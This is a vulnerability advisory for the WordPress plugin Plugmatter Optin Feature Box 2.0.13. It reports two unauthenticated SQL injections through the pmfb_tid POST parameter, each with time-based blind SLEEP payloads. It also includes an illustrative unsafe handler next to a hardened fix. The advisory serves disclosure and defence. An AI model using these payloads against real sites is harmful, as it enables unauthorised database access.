Plugin: Plugmatter Optin Feature Box 2.0.13
https://wordpress.org/plugins/plugmatter-optin-feature-box-lite/
Unauthenticated attackers can execute arbitrary SQL commands.
1. SQL injection (Plugmatter_FeatureBox::pmfb_cc())
Method: POST
Vulnerable parameter: pmfb_tid
Example PHP callstack:
Plugmatter_FeatureBox::pmfb_cc [/plugmatter-optin-feature-box-lite/class.plugmatter-featurebox.php:328]
wpdb::get_row
Verification:
...
Parameter: pmfb_tid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pmfb_tid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))jvLs)
...
2. SQL injection (Plugmatter_FeatureBox::pmfb_mailchimp())
Method: POST
Vulnerable parameter: pmfb_tid
Example PHP callstack:
Plugmatter_FeatureBox::pmfb_mailchimp [/plugmatter-optin-feature-box-lite/class.plugmatter-featurebox.php:389]
wpdb::get_row
Verification:
...
Parameter: pmfb_tid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pmfb_tid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))gQfj)
...
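Both findings above share one root cause: a POST value (pmfb_tid) reaches the query string handed to wpdb::get_row without being coerced to an integer or bound through wpdb::prepare(). The following PHP is an added illustration written for this advisory, not code from the plugin; the handler names, the table name (pmfb_templates) and the column (id) are assumptions chosen only to show the unsafe pattern next to the hardened form.

```php
<?php
// Added illustration, not the plugin's code. A hypothetical WordPress handler
// that shows the unsafe pattern behind the advisory (a POST value concatenated
// into the query passed to wpdb::get_row) beside a hardened version.
// Table name, column name and function names are assumptions.

// Unsafe: $_POST['pmfb_tid'] reaches the SQL string unchanged, so a value
// such as "1 AND (SELECT * FROM (SELECT(SLEEP(5)))x)" becomes part of the
// query. That is exactly the time-based blind behaviour reported above.
function pmfb_lookup_template_unsafe() {
    global $wpdb;
    $tid   = $_POST['pmfb_tid'];
    $table = $wpdb->prefix . 'pmfb_templates';          // assumed table name
    return $wpdb->get_row( "SELECT * FROM {$table} WHERE id = {$tid}" );
}

// Hardened: the identifier is coerced to a non-negative integer with absint()
// and bound through wpdb::prepare() with %d, so attacker-controlled text can
// no longer change the structure of the query.
function pmfb_lookup_template_safe() {
    global $wpdb;
    if ( ! isset( $_POST['pmfb_tid'] ) ) {
        return null;
    }
    // absint() of "1 AND (SELECT ...)" yields 1; the injected tail is discarded.
    $tid = absint( wp_unslash( $_POST['pmfb_tid'] ) );
    if ( 0 === $tid ) {
        return null;                                    // reject non-numeric input
    }
    $table = $wpdb->prefix . 'pmfb_templates';          // assumed table name
    return $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $tid )
    );
}
```

The same change applies at both reported call sites (pmfb_cc and pmfb_mailchimp), since each passes the same parameter into wpdb::get_row. A quick way to confirm a fix is to replay the verification request with a SLEEP() payload: with the hardened form the response returns immediately, because the value is bound as an integer and the SLEEP() expression never reaches MySQL. If these handlers are only meant to serve the plugin's own front-end forms, a nonce check (check_ajax_referer()) in front of the lookup additionally limits who can reach the query at all.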
--
Regards,
Marcin Probola,